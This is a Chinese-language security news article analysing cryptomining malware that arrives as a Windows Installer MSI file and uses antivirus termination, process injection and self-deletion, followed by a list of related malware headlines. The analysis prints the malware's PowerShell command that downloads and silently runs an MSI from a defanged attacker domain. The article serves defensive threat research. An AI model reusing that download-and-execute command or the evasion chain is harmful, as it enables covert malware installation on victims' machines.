加密貨幣挖礦惡意軟體使用Windows installer繞過技術

2021-01-18 嘶吼專業版

加密貨幣挖礦惡意軟體開始使用一些包括Windows installer在內的新的繞過技術。

加密貨幣挖礦惡意軟體數量不斷增長的一個原因是其暴利性,另一個原因是可以在系統中不被檢測到,尤其是使用了不同的混淆技術後更難檢測。研究人員發現,攻擊者在不斷的向加密貨幣挖礦惡意軟體中添加混淆技術來繞過AV的檢測。

安裝器行為


圖1. 惡意軟體感染鏈

惡意軟體以Windows installer MSI文件的形式到達受害者機器,Windows installer MSI文件是一個用於安裝軟體的合法應用程式。使用真實的Windows組件可以使其看著不那麼可疑,而且可以繞過一些安全過濾器。

研究人員分析樣本的安裝過程發現,惡意MSI文件會將自己安裝到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server目錄下,如果用戶設備上不存在該目錄,就會創建該目錄。該目錄含有許多不同的文件,作為攻擊鏈的一部分:

· bat – 用於終止正在運行的反病毒軟體的腳步文件

· exe – 用於解壓釋放在另一個目錄中的icon.ico文件的解壓工具

· ico – 密碼保護的zip文件,顯示為icon文件

解壓icon.ico後出現兩個文件:

· ocx – 加載器模塊,負責解密和安裝加密貨幣挖礦模塊

· bin – 加密的,UPX打包的,Delphi 編譯的加密貨幣挖礦模塊

安裝過程的另一部分包含在%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}中創建kernel文件ntdll.dll和Windows USER組件user32.dll。研究人員這是為了預防惡意軟體API的檢測。如下所示的配置文件也會釋放到 %UserTemp%\[Random Number]文件夾中。

圖2. 挖礦機的配置文件

安裝過程使用的語言是Cyrillic而非英語,這或許暗示著惡意軟體來源的區域。

圖3. 安裝過程顯示窗口

進程注入和監視器創建

安裝後,在執行以下命令前,ex.exe文件會解壓icon.ico文件:

rundll32 default.ocx,Entry u

為注入代碼創建3個新Service Host (svchost.exe)進程。前兩個SvcHost進程起著監視器的作用。當注入的svchost進程中止後,這兩個進程負責通過powerShell命令重新下載Windows Installer (.msi)文件。

「powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[『User-Agent』] = 『Windows Installer』;$f = 『C:\%UserTemp%\{random number}.msi』; $cli.DownloadFile(『hxxps://superdomain1709[.]info/update[.]txt』, $f);Start-Process $f -ArgumentList 『/q』」

然後將第三個SvcHost進程注入到挖礦機模塊並使用下面的命令執行:

「%system32%\svchost.exe –config={malware configuration path}

圖4. 第三個Service Host進程

為了使用檢測和分析變得更難,惡意軟體還有自毀機制。首先,創建和執行下面的文件:

{Random Characters}.cmD <- self-delete command-line script

然後刪除安裝目錄中的所有文件,並移除系統內所有的安裝痕跡。

惡意軟體非常特別的一點是使用主流的Windows Installer builder WiX作為打包器,有點像一層反檢測層。這也說明攻擊者在不斷努力來保證其創建活動處於隱蔽狀態。

相關焦點

  • mac 惡意軟體使用run-only AppleScripts繞過檢測
    概述 近日,研究人員發現一起攻擊macOS用戶的加密貨幣挖礦攻擊活動,其中使用的惡意軟體經過複雜的進化給研究人員的分析工作帶來了很大的困難和挑戰
  • Check Point:2018年10月十大惡意軟體
    Check Point近期發布了最新的全球安全威脅指數,該指數顯示了近期的惡意軟體、移動端惡意軟體以及漏洞方面的變化趨勢,可作為一定的參考。在所有的排行中,挖礦類的惡意軟體仍然是個中頭牌,Coinhive仍然是目前使用範圍最廣、數量最多的惡意軟體,在全球範圍佔據了約18%的比例,而Cryptoloot也已上升至第二名,佔比約8%。雖然密碼管理器的仍然是主要威脅,但目前的調查顯示,用戶的敏感數據、銀行和支付信息等各類數據仍舊對網絡犯罪有巨大的吸引力。
  • 「藍色知更鳥」正在挖掘加密貨幣
    「藍色知更鳥」正在挖掘加密貨幣 美國一家網絡安全公司的研究人員發現了一種新型的威脅,此威脅的終極目的是挖掘加密貨幣。作者:超級盾來源:超級盾訂閱號|2020-05-14 09:39 美國一家網絡安全公司的研究人員發現了一種新型的威脅,此威脅的終極目的是挖掘加密貨幣
  • 數字加密貨幣:如何選擇礦池挖礦賺錢?
    不管開採的加密貨幣如何,以下是在選擇池時要注意的事項:池中的參與者數,這會影響個人收入。Ping時間或時間延遲,這是用戶計算機需要將信息傳輸到池的結果。Ping時間取決於距離,Ping越低,時間延遲越短,數據傳輸越快。較高頻率的ping不適合,因為在加密貨幣網絡中的區塊更改之間存在暫停,而使用較高頻率的ping,用戶的計算機可以越過舊區塊的值並徒勞地挖礦。
  • 區塊鏈早報 | 小米區塊鏈寵物「加密兔」內測疑似流出;幣安懸賞25...
    比特大陸可能將在華盛頓州設挖礦工廠 吳忌寒或是新公司Ant Creek唯一管理人據外媒coindesk報導稱,加密貨幣挖礦巨頭比特大陸(Bitmain)似乎與一家名為Ant Creek, LLC的新公司有關聯。而根據相關報導稱,這家公司正計劃在華盛頓州建立挖礦設施。
  • 挖礦肉雞致卡慢!360瀏覽器、谷歌chrome重拳打擊惡意挖礦
    2017年9月,知名盜版資源發布站點Pirate Bay(海盜灣)被發現其網頁中包含挖礦腳本之後,這種行為才算正式曝光。最初這種挖礦方式因系統資源佔用巨大、關閉網頁可終止挖礦進程等原因較易防範。而隨著挖礦腳本的不斷升級,隨著網頁挖礦腳本的興起,許多網站開始通過技術方式掩蓋挖礦時所產生的大量系統資源消耗。
  • 雷蛇推挖礦軟體SoftMiner 想利用玩家閒置電腦資源挖礦
    首頁 > 見聞 > 關鍵詞 > 雷蛇最新資訊 > 正文 雷蛇推挖礦軟體SoftMiner 想利用玩家閒置電腦資源挖礦
  • 浣熊惡意軟體會影響所有瀏覽器
    圖片來源:Andriano.cz / Shutterstock由於其積極的營銷策略,使用防彈託管和易於使用的後端該惡意軟體是去年由 Cybereason 公司的安全研究人員首次發現的,每月收費 200 美元。Raccoon 與其他惡意軟體的不同之處在於,它採用了基於訂閱的業務模型,其中包括技術支持,錯誤修復和更新。它還允許網絡罪犯從各種瀏覽器和其他應用程式中竊取數據和加密貨幣。
  • 攻擊者利用惡意軟體繞過DNA檢測,或引發「生物戰」
    在學術期刊《自然生物技術》上發表的一篇題為《網絡生物安全:合成生物學中的遠程DNA注入威脅》的研究論文記錄了如何使用惡意軟體破壞生物學家的計算機,以替換DNA測序中的子字符串。 攻擊者可以利用《合成雙鏈DNA和統一的篩選協議v2.0系統供應商的篩選框架指南》的漏洞繞過協議,從而開展攻擊。
  • 黑客通過惡意軟體繞過DNS檢測,或引發倫理災難
    打開APP 黑客通過惡意軟體繞過DNS檢測,或引發倫理災難 Sandra1432 發表於 2020-12-02 15:51:16
  • 新型Linux惡意軟體出現,利用狗幣API實施入侵
    其中一種他們常用的手段是掃描可被公開訪問的Docker伺服器,然後利用配置錯誤的Docker API埠來設置自己的環境並在受害者的基礎設施上運行惡意軟體。而Ngrok botnet則是其中一個利用這種方法、並且現存持續時間最久的一個攻擊活動。
  • 挖礦病毒劫持名單公布,這400個網站你都上過嗎?快重裝系統吧!
    重點關注最近,區塊鏈產業發展越來越好,數字貨幣也被更多的人和機構所接受,但是最近出現了一個比較困擾幣圈的問題,那就是安全,不管是BEC和ZEC的被攻擊,還是EOS被爆出來的史詩漏洞,都觸動了韭菜們脆弱的心弦,而其實我們自己的計算機也不算安全,被惡意挖礦軟體劫持的案例也在不斷增加,
  • 加密礦機供不應求,比特大陸礦機挖礦價格最低只需5000美元/BTC
    來源:華夏時報華夏時報(www.chinatimes.net.cn)記者 王永菲 冉學東 北京報導比特幣在19000美元附近橫盤震蕩,多個主流加密貨幣價格也處在突破歷史高點之際,加密礦機作為加密行業的上遊企業
  • RubyMiner挖礦程序24小時內影響全球30%的網絡
    在過去的24小時內,全球 30% 的網絡都遭遇了針對 web 伺服器的加密貨幣挖礦攻擊。在此期間,該攻擊者試圖掃描全球網絡,從中找到易受攻擊的 web 伺服器用於挖礦。主要受影響的國家是美國、德國、英國、挪威和瑞典,但全球其他國家也未能倖免。
  • 比特幣即將進入牛市 雲算力手機挖礦成為礦工們的新選擇
    10月1日,央視CCTV、新華社終於和全球媒體一樣,把加密貨幣當成一個正經的投資市場看待報導了,最關鍵的是終於不是「虛擬貨幣」,也不是「數字貨幣」,而是「加密貨幣」了!認知很關鍵,世界沒有虛擬不虛擬,實體不實體的,賺錢的市場就是活躍的市場,就是經濟追逐的市場,就是有發展空間的市場。
  • 美國下黑手致經濟崩潰,委內瑞拉軍隊靠「挖礦」生產比特幣繞過制裁...
    【環球網軍事頻道】據委內瑞拉陸軍波利瓦爾第6工兵團近日在其官方社交媒體帳號上發布的視頻顯示,其下屬的第61營在首都加拉加斯市建設的「數字貨幣生產中心」於近日投入使用。
  • 萊特幣ltc挖礦教程:cpu挖礦與gpu挖礦(詳細圖文)
    萊特幣Litecoin是繼比特幣之後最有潛力的一個山寨幣,礦工都說,如果比特幣是貨幣世界的黃金,萊特幣就是白銀。比起比特幣的專業礦機,萊特幣挖礦比較平民化,用普通的電腦就可以。小編特整理了萊特幣ltc挖礦教程,用詳細的圖文介紹萊特幣的兩種挖礦方法:cpu挖礦與gpu挖礦。
  • Gitpaste-12惡意軟體通過GitHub和Pastebin攻擊Linux伺服器和IoT設備
    Gitpaste-12惡意軟體通過GitHub和Pastebin攻擊Linux伺服器和IoT設備 Gitpaste-12是一種新蠕蟲,它使用GitHub和Pastebin來存儲組件代碼,並且至少有12種不同的攻擊模塊可用。Juniper Threat實驗室已經發現了這一點。
  • 新型惡意程序Snatch曝光:進入安全模式加密數據向受害者勒索比特幣
    Sophos的安全研究團隊近日發現了名為Snatch的勒索軟體,利用Windows的功能來繞過安裝在PC上的安全軟體。這款勒索軟體會讓你的PC崩潰,並迫使受感染設備重新啟動進入安全模式。而在安全模式下,通常會禁用防病毒和其他安全軟體,從而允許該惡意程序作為服務進行自啟,對PC進行全盤加密,最後向受害者勒索比特幣。在過去3個月內,Sophos已經收到了12例關於該勒索軟體的反饋報告,要求比特幣贖金在2900美元至51,000美元之間。